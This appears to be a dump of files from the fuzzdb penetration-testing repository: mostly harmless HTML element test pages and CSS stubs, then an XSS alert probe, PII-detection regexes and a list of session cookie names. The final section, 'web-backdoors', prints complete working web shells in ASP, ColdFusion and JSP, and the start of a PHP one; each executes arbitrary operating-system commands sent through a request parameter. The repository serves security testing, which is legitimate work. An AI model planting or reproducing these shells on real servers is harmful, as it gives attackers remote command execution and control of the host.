-------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: S element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: S element</h2> 11 | 12 | <hr> 13 | filler text <s>strikethrough text</s> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/samp-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: SAMP element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: SAMP element</h2> 11 | 12 | <hr> 13 | filler text <samp>sample text</samp> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/small-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: SMALL element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: SMALL element</h2> 11 | 12 | <hr> 13 | filler text <small>small text</small> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/span-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: SPAN element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: SPAN element</h2> 11 | 12 | <hr> 13 | filler text <span CLASS="greensection" STYLE="color: lime">text within a span tag</span> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/strike-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: STRIKE element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: STRIKE element</h2> 11 | 12 | <hr> 13 | filler text <strike>strikethrough text</strike> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/strong-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: STRONG element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: STRONG element</h2> 11 | 12 | <hr> 13 | filler text <strong>strong text</strong> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/style-bp1.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>STYLE: Browser Peculiarities: Nesting contents in comments</title> 6 | <style> 7 | .assert { color: green } 8 | .test { background-color: green; color: yellow; } 9 | </style> 10 | </head> 11 | 12 | <body> 13 | 14 | <big><b><u>Assertion:</u></b></big> 15 | <div class="assert">While the author CAN legally omit using the HTML comment to 16 | encapsulate the Style information, most older browsers will display the style 17 | information in these cases as document content. Authors are strongly encouraged 18 | to use the HTML Comment for the Style element to prevent this from happening.</div> 19 | <br> 20 | 21 | <b>Simple DIV element with class="test". 22 | Style element is NOT nested in a comment, and contains: ".test { background-color: green; color: yellow }":</b> 23 | <hr> 24 | filler text 25 | <div class="test">This is a div</div> 26 | filler text 27 | <hr> 28 | <br> 29 | 30 | </body> 31 | </html> 32 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/style-bp2.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>STYLE: Browser Peculiarities: Nesting contents in comments</title> 6 | <style> 7 | <!-- 8 | .assert { color: green } 9 | .test { background-color: green; color: yellow; } 10 | --> 11 | </style> 12 | </head> 13 | 14 | <body> 15 | 16 | <big><b><u>Assertion:</u></b></big> 17 | <div class="assert">While the author CAN legally omit using the HTML comment to 18 | encapsulate the Style information, most older browsers will display the style 19 | information in these cases as document content. Authors are strongly encouraged 20 | to use the HTML Comment for the Style element to prevent this from happening.</div> 21 | <br> 22 | 23 | <b>Simple DIV element with class="test". 24 | Style element IS nested in a comment, and contains: ".test { background-color: green; color: yellow }":</b> 25 | <hr> 26 | filler text 27 | <div class="test">This is a div</div> 28 | filler text 29 | <hr> 30 | <br> 31 | 32 | </body> 33 | </html> 34 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/style-bp4.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>STYLE: Browser Peculiarities: Multiple STYLE element blocks</title> 6 | <style> 7 | .assert { color: green } 8 | .test { color: green; } 9 | </style> 10 | <style> 11 | .test { background-color: yellow; } 12 | </style> 13 | </head> 14 | 15 | <body> 16 | 17 | <big><b><u>Assertion:</u></b></big> 18 | <div class="assert">IE 3.0 only allowed for a single LINK or STYLE block. 19 | Only the last one specified in the document is used. 20 | IE 4.0 and above, Netscape and Opera merge/cascade multiple STYLE elements.</div> 21 | <br> 22 | 23 | <b>Simple DIV element with class="test". <br> 24 | First STYLE block contains ".test { color: green }". Second STYLE block contains 25 | ".test { background-color: yellow }". <br> 26 | Both should be cascaded together on the one 27 | test DIV to produce a div with background-color=yellow and color=green.</b> 28 | <hr> 29 | filler text 30 | <div class="test">This is a div</div> 31 | filler text 32 | <hr> 33 | <br> 34 | 35 | </body> 36 | </html> 37 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/sub-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: SUB element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: SUB element</h2> 11 | 12 | <hr> 13 | filler text <sub>subscripted text</sub> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/s/sup-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: SUP element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: SUP element</h2> 11 | 12 | <hr> 13 | filler text <sup>superscripted text</sup> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/t/title-bp1.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title></title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">Some browsers may react badly to titles of null length or greater than 256 characters.</div> 15 | 16 | <br> 17 | <b>The title element of this document is empty</b> 18 | 19 | </body> 20 | </html> 21 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/t/title-bp3.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <style> 6 | .assert { color: green } 7 | </style> 8 | </head> 9 | 10 | <body> 11 | 12 | <big><b><u>Assertion:</u></b></big> 13 | <div class="assert">Although it is a required element in the specification, most 14 | popular browsers will not react oddly to its absence.</div> 15 | 16 | <br> 17 | <b>This document has no title element.</b> 18 | 19 | </body> 20 | </html> 21 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/t/tt-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: TT element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: TT element</h2> 11 | 12 | <hr> 13 | filler text <tt>Fixed-width text</tt> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/u/u-bp1.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>U: Tips/Tricks: Underline element possible confusion with hyperlink appearance</title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">Use of the U element can possibly generate confusion with 15 | hyperlinks which generally carry a characteristic underlining effect.</div> 16 | 17 | <br> 18 | <b>Using U element alone:</b> 19 | <hr> 20 | <span>filler text <u>Link to Yahoo.com</u> filler text</span> 21 | <hr> 22 | <br> 23 | 24 | <b>Using U element with FONT COLOR element (with typical browser unvisited link color):</b> 25 | <hr> 26 | <span>filler text <u><font color="blue">Link to Yahoo.com</font></u> filler text</span> 27 | <hr> 28 | <br> 29 | 30 | <b>Using A HREF element linking to yahoo.com :</b> 31 | <hr> 32 | <span>filler text <a href="http://www.yahoo.com/">Link to Yahoo.com</a> filler text</span> 33 | <hr> 34 | 35 | 36 | </body> 37 | </html> 38 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/u/u-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: U element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: U element</h2> 11 | 12 | <hr> 13 | filler text <u>Underlined text</u> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/v/var-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: VAR element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: VAR element</h2> 11 | 12 | <hr> 13 | filler text <var>A Variable</var> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/x/xmp-bp1.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>XMP: Browser Peculiarities: Displaying all characters literally</title> 6 | <style> 7 | .assert { color: green } 8 | </style> 9 | </head> 10 | 11 | <body> 12 | 13 | <big><b><u>Assertion:</u></b></big> 14 | <div class="assert">Netscape and Mosaic are the only browsers to display all characters literally.</div> 15 | 16 | <br> 17 | <b>Using XMP element:</b> 18 | <hr> 19 | filler text 20 | <xmp>xmp <b>NESTED BOLD ELEMENT</b>, character entity: &amp; xmp</xmp> 21 | filler text 22 | <hr> 23 | <br> 24 | 25 | 26 | 27 | </body> 28 | </html> 29 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/x/xmp-example.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 | 3 | <html> 4 | <head> 5 | <title>Code example: XMP element</title> 6 | </head> 7 | 8 | <body> 9 | 10 | <h2>Code example: XMP element</h2> 11 | 12 | <hr> 13 | filler text <xmp>XMP content</xmp> filler text 14 | <hr> 15 | 16 | </body> 17 | </html> 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/crosshair.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/crosshair.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediaall.css: -------------------------------------------------------------------------------- 1 | #mediaall, #test1 { background-color: green; text-transform: uppercase; } -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediaaural.css: -------------------------------------------------------------------------------- 1 | #mediaaural { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediabraille.css: -------------------------------------------------------------------------------- 1 | #mediabraille { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediaembossed.css: -------------------------------------------------------------------------------- 1 | #mediaembossed { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediahandheld.css: -------------------------------------------------------------------------------- 1 | #mediahandheld { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediaprint.css: -------------------------------------------------------------------------------- 1 | #mediaprint { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediaprojection.css: -------------------------------------------------------------------------------- 1 | #mediaprojection { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediascreen.css: -------------------------------------------------------------------------------- 1 | #mediascreen, #test2 { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediaspeech.css: -------------------------------------------------------------------------------- 1 | #mediaspeech { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediatty.css: -------------------------------------------------------------------------------- 1 | #mediatty { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/css/mediatv.css: -------------------------------------------------------------------------------- 1 | #mediatv { background-color: green; text-transform: uppercase; } 2 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/imagemap-bluelink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/imagemap-bluelink.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/imagemap-defaultlink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/imagemap-defaultlink.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/imagemap-greenlink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/imagemap-greenlink.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/imagemap-orangelink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/imagemap-orangelink.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/imagemap-yellowlink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/imagemap-yellowlink.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/imagemapring.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/imagemapring.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/imagemaptest.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/imagemaptest.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/animeyes.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/animeyes.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/centeringgrid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/centeringgrid.png -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/left.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/left.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/overlap.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/overlap.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/right.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/right.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/tilepattern.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/tilepattern.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/wrench.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/wrench.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/images/zenpattern.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/images/zenpattern.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/objects/urlbutton.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/testing/objects/urlbutton.class -------------------------------------------------------------------------------- /docs/misc/netcat_cheat_sheet_v1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/netcat_cheat_sheet_v1.pdf -------------------------------------------------------------------------------- /docs/misc/windows_command_line_sheet_v1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/windows_command_line_sheet_v1.pdf -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | <script>alert(1);</script> 2 | -------------------------------------------------------------------------------- /regex/pii.fuzz.txt: -------------------------------------------------------------------------------- 1 | \b(1800|2131|30[0-5]\d|3[4-7]\d{2}|4\d{3}|5[0-5]\d{2}|6011|6[2357]\d{2})[- ]?(\d{4}[- ]?\d{4}[- ]?\d{4}|\d{6}[- ]?\d{5})\b 2 | \b\d{4}(0[1-9]|[12]\d|3[01])(0[1-9]|1[0-5])\d{2}\b 3 | \b\d{2}([024][1-9]|[135][0-2])(0[1-9]|[12]\d|3[01])[-+]?\d{4}\b 4 | \b[1-9]\d{2}[- ]?\d{3}[- ]?\d{3}\b 5 | \b\d{6}(19|20)\d{2}(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])\d{4}\b 6 | \b(0[1-9]|[12]\d|3[01])(0[1-9]|1[0-2])(9\d{2}|0[01]\d)\d{6}\b 7 | \b(0[1-9]|[12]\d|3[01])(0[1-9]|1[0-2])\d{2}[-+]?\d{4}\b 8 | \b(0[1-9]|[12]\d|3[01])(0[1-9]|1[0-2])\d{2}[-+a]\d{3}\w\b 9 | \b[a-z]{3}[abcfghjlpt][a-z]\d{4}[a-z]\b 10 | \b([a-z]{2}[ ]\d{1,2}|dl[ ][1-9]?\d[ ][cprstvy])[ ][a-z]{0,2}[ ]\d{1,4}\b 11 | \b([bcdfghj-np-tv-z][a-z]{2}){2}\d{2}[a-ehlmprst]([04][1-9]|[1256]\d|[37][01])(\d[a-z]{3}|z\d{3})[a-z]\b 12 | \b(0[1-9]|[12]\d|3[01])([04][1-9]|[15][0-2])\d{7}\b 13 | \b[1-8]\d{2}(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])(0[1-9]|[1-4]\d|5[0-2]|99)\d{4}\b 14 | \b\d{2}(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])\-[0-49]\d{6}\b 15 | \b(19\d{2}|20\d{2}|\d{2})(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])[-+]?\d{4}\b 16 | \b[a-z][12]\d{8}\b 17 | \b[abceghj-prstw-z][abceghj-nprstw-z][ ]?\d{2}[ ]?\d{2}[ ]?\d{2}[ ]?[a-dfm]?\b 18 | \b(?!000)(?!666)([0-6]\d{2}|7([0-356]\d|7[012]))[- ]?(?!00)\d{2}[- ]?(?!0000)\d{4}\b 19 | -------------------------------------------------------------------------------- /regex/readme.txt: -------------------------------------------------------------------------------- 1 | lists of error messages for regex matching 2 | 3 | docs for errors.txt: 4 | http://code.google.com/p/fuzzdb/wiki/regexerrors 5 | 6 | -------------------------------------------------------------------------------- /regex/sessionid.txt: -------------------------------------------------------------------------------- 1 | ASP.NET_SessionId 2 | ASPSESSIONID 3 | SITESERVER 4 | cfid 5 | cftoken 6 | jsessionid 7 | sessid 8 | sid 9 | viewstate 10 | zenid 11 | -------------------------------------------------------------------------------- /web-backdoors/asp/cmd.asp: -------------------------------------------------------------------------------- 1 | <!-- 2 | 3 | ASP_KIT 4 | 5 | cmd.asp = Command Execution 6 | 7 | by: Maceo 8 | modified: 25/06/2003 9 | 10 | --> 11 | 12 | <% 13 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 14 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 15 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 16 | 17 | szCMD = request("cmd") 18 | 19 | If (szCMD <> "") Then 20 | szTempFile = "C:\" & oFileSys.GetTempName( ) 21 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 22 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 23 | End If 24 | %> 25 | 26 | <HTML> 27 | <BODY> 28 | <FORM action="" method="GET"> 29 | <input type="text" name="cmd" size=45 value="<%= szCMD %>"> 30 | <input type="submit" value="Run"> 31 | </FORM> 32 | <PRE> 33 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 34 | <br> 35 | <% 36 | If (IsObject(oFile)) Then 37 | On Error Resume Next 38 | Response.Write Server.HTMLEncode(oFile.ReadAll) 39 | oFile.Close 40 | Call oFileSys.DeleteFile(szTempFile, True) 41 | End If 42 | %> 43 | </BODY> 44 | </HTML> 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /web-backdoors/asp/ntdaddy.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/web-backdoors/asp/ntdaddy.asp -------------------------------------------------------------------------------- /web-backdoors/cfm/cmd.cfm: -------------------------------------------------------------------------------- 1 | <html> 2 | <body> 3 | 4 | <cfoutput> 5 | <table> 6 | <form method="POST" action=""> 7 | <tr> 8 | <td>Command:</td> 9 | <td> < input type=text name="cmd" size=50<cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td> 10 | </tr> 11 | <tr> 12 | <td>Options:</td> 13 | <td> < input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td> 14 | </tr> 15 | <tr> 16 | <td>Timeout:</td> 17 | <td>< input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5" </cfif> > </td> 18 | </tr> 19 | </table> 20 | <input type=submit value="Exec" > 21 | </FORM> 22 | 23 | <cfsavecontent variable="myVar"> 24 | <cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> 25 | </cfexecute> 26 | </cfsavecontent> 27 | <pre> 28 | #myVar# 29 | </pre> 30 | </cfoutput> 31 | </body> 32 | </html> -------------------------------------------------------------------------------- /web-backdoors/exe/nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/web-backdoors/exe/nc.exe -------------------------------------------------------------------------------- /web-backdoors/jsp/CmdServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/web-backdoors/jsp/CmdServlet.class -------------------------------------------------------------------------------- /web-backdoors/jsp/ListServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/web-backdoors/jsp/ListServlet.class -------------------------------------------------------------------------------- /web-backdoors/jsp/UpServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/web-backdoors/jsp/UpServlet.class -------------------------------------------------------------------------------- /web-backdoors/jsp/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (unix) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | <HTML><BODY> 13 | <FORM METHOD="GET" NAME="myform" ACTION=""> 14 | <INPUT TYPE="text" NAME="cmd"> 15 | <INPUT TYPE="submit" VALUE="Send"> 16 | </FORM> 17 | <pre> 18 | <% 19 | if (request.getParameter("cmd") != null) { 20 | out.println("Command: " + request.getParameter("cmd") + "<BR>"); 21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); 28 | disr = dis.readLine(); 29 | } 30 | } 31 | %> 32 | </pre> 33 | </BODY></HTML> 34 | 35 | 36 | -------------------------------------------------------------------------------- /web-backdoors/jsp/cmdjsp.jsp: -------------------------------------------------------------------------------- 1 | // note that linux = cmd and windows = "cmd.exe /c + cmd" 2 | 3 | <FORM METHOD=GET ACTION='cmdjsp.jsp'> 4 | <INPUT name='cmd' type=text> 5 | <INPUT type=submit value='Run'> 6 | </FORM> 7 | 8 | <%@ page import="java.io.*" %> 9 | <% 10 | String cmd = request.getParameter("cmd"); 11 | String output = ""; 12 | 13 | if(cmd != null) { 14 | String s = null; 15 | try { 16 | Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); 17 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 18 | while((s = sI.readLine()) != null) { 19 | output += s; 20 | } 21 | } 22 | catch(IOException e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | %> 27 | 28 | <pre> 29 | <%=output %> 30 | </pre> 31 | 32 | <!-- http://michaeldaw.org 2006 --> 33 | -------------------------------------------------------------------------------- /web-backdoors/jsp/win32/cmd_win32.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*,java.net.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (win32) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | <HTML><BODY> 13 | <FORM METHOD="POST" NAME="myform" ACTION=""> 14 | <INPUT TYPE="text" NAME="cmd"> 15 | <INPUT TYPE="submit" VALUE="Send"> 16 | </FORM> 17 | <pre> 18 | <% 19 | if (request.getParameter("cmd") != null) { 20 | out.println("Command: " + request.getParameter("cmd") + "\n<BR>"); 21 | Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); disr = dis.readLine(); } 28 | } 29 | %> 30 | </pre> 31 | </BODY></HTML> -------------------------------------------------------------------------------- /web-backdoors/php/cmd.php: -------------------------------------------------------------------------------- 1 | <? 2 | // 3 | // PHP_KIT 4 | // 5 | // cmd.php = Command Execution 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 | <HTML><BODY> 12 | <FORM METHOD="GET" NAME="myform" ACTION=""> 13 | <INPUT TYPE="text" NAME="cmd"> 14 | <INPUT TYPE="submit" VALUE="Send"> 15 | </FORM> 16 | <pre> 17 | <? 18 | if($_GET['cmd']) { 19 | 